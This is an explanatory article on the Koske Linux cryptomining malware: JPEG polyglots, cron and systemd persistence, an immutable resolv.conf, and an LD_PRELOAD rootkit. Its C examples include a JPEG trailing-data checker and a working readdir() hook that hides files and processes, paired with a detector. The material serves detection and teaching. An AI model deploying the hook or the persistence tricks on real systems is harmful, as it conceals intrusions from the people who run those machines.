A new Linux malware variant, known as Koske, has emerged, reportedly leveraging artificial intelligence in its design. This sophisticated threat employs seemingly innocuous JPEG images of panda bears as a means to inject malware directly into system memory.
Analysis of Koske
Research from AquaSec, a cybersecurity firm, has characterized Koske as a highly advanced Linux threat. The malware’s adaptive behaviors suggest it may have been developed utilizing large language models (LLMs) or modern automation frameworks, reflecting a significant evolution in cyber attack sophistication.
Koske primarily targets computational resources to deploy CPU and GPU-optimized cryptocurrency miners, allowing it to mine over 18 different cryptocurrencies. The ongoing attacks have been traced to IP addresses in Serbia, with evidence of localized language use in both scripts and repositories, although definitive attribution remains elusive.
Mechanism of Infection
Initial access is gained through misconfigured, publicly exposed JupyterLab instances that allow command execution. Once inside, the attacker downloads two JPEG images of panda bears from legitimate hosting services such as OVH, Freeimage, and Postimage; each file carries a concealed malicious payload.
AquaSec emphasizes that the threat actor uses polyglot files rather than traditional steganography: a single file is a valid JPEG to an image viewer and a script to a shell, depending on which program reads it. Each file carries a complete JPEG (header through end-of-image marker) followed by appended malicious shell script and C source.
Opened in an image viewer, the file renders as a cute panda and nothing more, because a JPEG decoder stops at the end-of-image marker and ignores whatever follows it. The image does not execute itself; the attacker's own commands extract the appended section and hand it to a script interpreter (and, for the C source, a compiler), so the payload runs without the file ever being "opened" in the usual sense. The same property helps defenders: any bytes after the end-of-image marker of a downloaded JPEG are a reliable sign that the file carries something extra.
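What the polyglot looks like at the byte level, and the check a defender can run on a downloaded image, as an added example in C written for this page (not code from AquaSec or from the Koske samples): the walker parses the JPEG marker structure up to the end-of-image marker and reports how many bytes follow it. The sample image is constructed for the example, with a made-up shell script appended after the marker; the function names jpeg_end_offset and jpeg_trailing_bytes are chosen here. Build with cc -o jpegtail jpegtail.c.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Walk JPEG marker segments and return the offset just past the EOI marker
 * (FF D9), or -1 if the stream is not well formed up to that point. */
long jpeg_end_offset(const uint8_t *buf, size_t len) {
    if (len < 4 || buf[0] != 0xFF || buf[1] != 0xD8) return -1;   /* must start with SOI */
    size_t pos = 2;
    while (pos + 1 < len) {
        if (buf[pos] != 0xFF) return -1;                            /* expected a marker */
        uint8_t m = buf[pos + 1];
        if (m == 0xFF) { pos++; continue; }                         /* fill byte before a marker */
        if (m == 0xD9) return (long)(pos + 2);                      /* EOI: the image ends here */
        if (m == 0x01 || (m >= 0xD0 && m <= 0xD8)) { pos += 2; continue; } /* TEM, RSTn, SOI */
        if (pos + 3 >= len) return -1;
        size_t seglen = ((size_t)buf[pos + 2] << 8) | buf[pos + 3]; /* includes the 2 length bytes */
        if (seglen < 2 || pos + 2 + seglen > len) return -1;
        pos += 2 + seglen;
        if (m == 0xDA) {
            /* SOS: entropy-coded data follows. Inside it, FF 00 is a stuffed byte and
             * FF D0..D7 a restart marker; the scan ends at any other marker. */
            while (pos + 1 < len) {
                uint8_t next = buf[pos + 1];
                if (buf[pos] == 0xFF && next != 0x00 && !(next >= 0xD0 && next <= 0xD7)) break;
                pos++;
            }
        }
    }
    return -1;  /* ran out of data before EOI */
}

/* Bytes that follow the image proper; > 0 means something rides along after EOI. */
long jpeg_trailing_bytes(const uint8_t *buf, size_t len) {
    long end = jpeg_end_offset(buf, len);
    return end < 0 ? -1 : (long)len - end;
}

/* Constructed sample: a syntactically valid (if undecodable) JPEG skeleton with a
 * made-up shell script appended after EOI, in the spirit of the Koske panda files. */
static const uint8_t SAMPLE_POLYGLOT[] = {
    0xFF, 0xD8,                                                 /* SOI */
    0xFF, 0xE0, 0x00, 0x10, 'J', 'F', 'I', 'F', 0x00,           /* APP0, length 16 */
    0x01, 0x01, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00,       /* JFIF 1.1, no thumbnail */
    0xFF, 0xDA, 0x00, 0x08, 0x01, 0x01, 0x00, 0x00, 0x3F, 0x00, /* SOS, one component */
    0x12, 0xFF, 0x00, 0x34,                                     /* entropy data; FF 00 is stuffing */
    0xFF, 0xD9,                                                 /* EOI: a decoder stops here */
    '\n', '#', '!', '/', 'b', 'i', 'n', '/', 's', 'h', '\n',    /* appended script (constructed) */
    'e', 'c', 'h', 'o', ' ', 'h', 'i', '\n'
};

int main(void) {
    size_t len = sizeof SAMPLE_POLYGLOT;
    long end = jpeg_end_offset(SAMPLE_POLYGLOT, len);
    long tail = jpeg_trailing_bytes(SAMPLE_POLYGLOT, len);
    printf("image ends at byte %ld, %ld trailing byte(s)\n", end, tail);
    if (tail > 0) printf("trailing data: %.*s", (int)tail, (const char *)SAMPLE_POLYGLOT + end);
    return tail > 0 ? 2 : 0;
}
```

Run against the sample, the walker reports that the image ends at byte 36 and that 19 bytes trail it, then prints the appended script that a viewer would never have read. Applied to every image a host has downloaded, a non-zero count is cheap triage; some legitimate encoders leave a few bytes of padding after EOI, so the size and content of the tail (a shebang line, C source) is the signal rather than its mere presence.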
Attack Execution
The attacks identified by AquaSec involve the execution of two distinct payloads embedded in each image, deployed in parallel:
- C Code Payload: C source that is compiled on the host into a shared object (.so) and loaded via LD_PRELOAD, where it functions as a user-space rootkit, without ever being dropped as a conventional executable.
- Shell Script Payload: a shell script, likewise run in memory, that relies on standard Linux utilities to establish persistence while keeping a low profile.
The shell script relies on native Linux commands, establishing persistence through a cron job that fires every 30 minutes and through custom systemd services. It also hardens its own network path and evades proxies: it overwrites /etc/resolv.conf to point at Cloudflare and Google DNS resolvers and then marks the file immutable with chattr +i, so that DHCP clients and resolver managers cannot restore the original configuration. A defender can spot this with lsattr /etc/resolv.conf (an unexpected i flag) and must run chattr -i before the file can be repaired.
Advanced Capabilities
Koske's readiness to manipulate system utilities points to a design focused on automation and stealth. The C-based rootkit is loaded through LD_PRELOAD and overrides readdir(), the libc function that tools such as ls, ps and top use to enumerate directories, /proc included. The override drops any directory entry whose name contains one of a set of keywords, and it keeps track of the PIDs to hide so that their numeric /proc directories are filtered as well, which conceals both the malware's files and its processes from user-space monitoring that goes through libc. The caveat for defenders is that the trick only affects callers that route through the preloaded library: a statically linked tool, a direct getdents64 system call, or inspection of the disk from another host sees the real listing.
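How a readdir() hook hides entries, and why a raw system call sees through it, as an added example in C written for this page (not the Koske rootkit's code). The override filters on a hypothetical keyword list; a real sample's keywords and PID list are attacker-chosen. Built with cc -shared -fPIC -o hook.so hook.c it is an LD_PRELOAD library; built as a normal executable (cc -o rkdemo hook.c, adding -ldl on glibc older than 2.34) the same override interposes on libc from the binary itself, which is what lets the detection half run in one file. count_hidden_entries() compares the names libc returns with the names the kernel returns through getdents64, which LD_PRELOAD cannot intercept. The function names, the keyword list and the sample directory in the usage note are assumptions made for the example.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <dlfcn.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>

#define MAX_ENTRIES 4096  /* larger directories are truncated; enough for /proc on most hosts */
#define NAME_LEN 256

/* Hypothetical keyword list; a real rootkit carries whatever its operator chose. */
static const char *HIDE_KEYWORDS[] = { "koske", "hideme", NULL };

/* 1 if a directory entry name matches a hide keyword, else 0. */
int should_hide(const char *name) {
    for (int i = 0; HIDE_KEYWORDS[i] != NULL; i++)
        if (strstr(name, HIDE_KEYWORDS[i]) != NULL) return 1;
    return 0;
}

/* The hook: same symbol name as libc's readdir(), so the dynamic linker resolves
 * calls to it first (from a preloaded .so or, as here, the executable itself).
 * RTLD_NEXT fetches the genuine libc function; matching entries are swallowed. */
struct dirent *readdir(DIR *dirp) {
    static struct dirent *(*real_readdir)(DIR *) = NULL;
    if (real_readdir == NULL)
        real_readdir = (struct dirent *(*)(DIR *))dlsym(RTLD_NEXT, "readdir");
    if (real_readdir == NULL) return NULL;  /* lookup failed; nothing to delegate to */
    struct dirent *ent;
    while ((ent = real_readdir(dirp)) != NULL)
        if (!should_hide(ent->d_name)) return ent;
    return NULL;  /* end of directory, or only hidden entries were left */
}

/* Names as seen through (possibly hooked) libc readdir(). */
static int list_via_readdir(const char *path, char names[][NAME_LEN]) {
    DIR *d = opendir(path);
    if (d == NULL) return -1;
    int n = 0;
    struct dirent *ent;
    while (n < MAX_ENTRIES && (ent = readdir(d)) != NULL)
        snprintf(names[n++], NAME_LEN, "%s", ent->d_name);
    closedir(d);
    return n;
}

/* Record layout returned by the getdents64 system call. */
struct linux_dirent64 {
    uint64_t d_ino; int64_t d_off; unsigned short d_reclen;
    unsigned char d_type; char d_name[];
};

/* Names straight from the kernel: LD_PRELOAD cannot intercept a raw syscall. */
static int list_via_getdents64(const char *path, char names[][NAME_LEN]) {
    int fd = open(path, O_RDONLY | O_DIRECTORY);
    if (fd < 0) return -1;
    uint64_t buf[1024];  /* 8 KiB, 8-byte aligned as the records require */
    int n = 0;
    long got;
    while ((got = syscall(SYS_getdents64, fd, buf, sizeof buf)) > 0)
        for (long off = 0; off < got && n < MAX_ENTRIES; ) {
            struct linux_dirent64 *d = (struct linux_dirent64 *)((char *)buf + off);
            snprintf(names[n++], NAME_LEN, "%s", d->d_name);
            off += d->d_reclen;
        }
    close(fd);
    return n;
}

/* Detection: every name the kernel reports that libc does not is being hidden.
 * Returns that count, or -1 if the directory cannot be read. */
int count_hidden_entries(const char *path) {
    static char seen[MAX_ENTRIES][NAME_LEN], raw[MAX_ENTRIES][NAME_LEN];
    int ns = list_via_readdir(path, seen), nr = list_via_getdents64(path, raw);
    if (ns < 0 || nr < 0) return -1;
    int hidden = 0;
    for (int i = 0; i < nr; i++) {
        int found = 0;
        for (int j = 0; j < ns && !found; j++) found = strcmp(raw[i], seen[j]) == 0;
        if (!found) { printf("hidden from readdir(): %s/%s\n", path, raw[i]); hidden++; }
    }
    return hidden;
}

int main(int argc, char **argv) {
    const char *dir = argc > 1 ? argv[1] : "/proc";  /* /proc: one directory per PID */
    int hidden = count_hidden_entries(dir);
    if (hidden < 0) { perror(dir); return 1; }
    printf("%s: %d entr%s hidden from readdir()\n", dir, hidden, hidden == 1 ? "y" : "ies");
    return hidden > 0 ? 2 : 0;
}
```

With a sample directory made for the purpose, mkdir /tmp/demo && touch /tmp/demo/notes.txt /tmp/demo/koske_worker && ./rkdemo /tmp/demo prints the hidden name and exits 2, while LD_PRELOAD=./hook.so ls /tmp/demo shows only notes.txt for any program that imports readdir(). Two things to keep in mind: binaries built with 64-bit file offsets import readdir64() instead, which a real rootkit hooks in exactly the same way, and procps enumerates /proc through readdir() too, which is how the same filter makes PIDs vanish from ps.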
Once network access and persistence are in place, the shell script fetches cryptocurrency miners from GitHub, chosen to match the host's hardware.
Cryptocurrency Mining Operations
Koske supports mining a diverse range of cryptocurrencies, among them Monero, Ravencoin, Zano, Nexa, and Tari. It profiles the host's CPU and GPU to choose the mining payload best suited to the hardware, and if a coin or mining pool becomes unavailable it switches to a backup from an internal list, a notable degree of automation.
Future Threat Landscape
AquaSec has raised alarms regarding the implications of AI-driven malware like Koske, emphasizing that future iterations may exhibit even greater adaptability and sophistication. As the landscape of cybersecurity continues to evolve, organizations must remain vigilant and proactive in their defenses against such advanced threats.